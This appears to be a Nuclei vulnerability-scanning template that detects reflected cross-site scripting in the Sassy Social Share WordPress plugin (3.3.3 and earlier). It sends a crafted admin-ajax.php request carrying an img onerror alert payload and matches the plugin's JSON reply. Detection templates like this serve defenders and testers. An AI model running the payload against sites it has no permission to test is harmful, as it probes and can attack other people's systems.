id: sassy-social-share-xss info: name: Sassy Social Share XSS author: Random-Robbie severity: medium description: Sassy Social Share <= 3.3.3 - Cross-Site Scripting (XSS) tags: wordpress,wp-plugin requests: - method: GET path: - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heateor_sss_sharing_count&urls[%3Cimg%20src%3dx%20onerror%3dalert(document.domain)%3E]=" matchers-condition: and matchers: - type: word words: - '{"facebook_urls":[{"":""}],"status":1,"message":{"":{"twitter":0}}}' part: body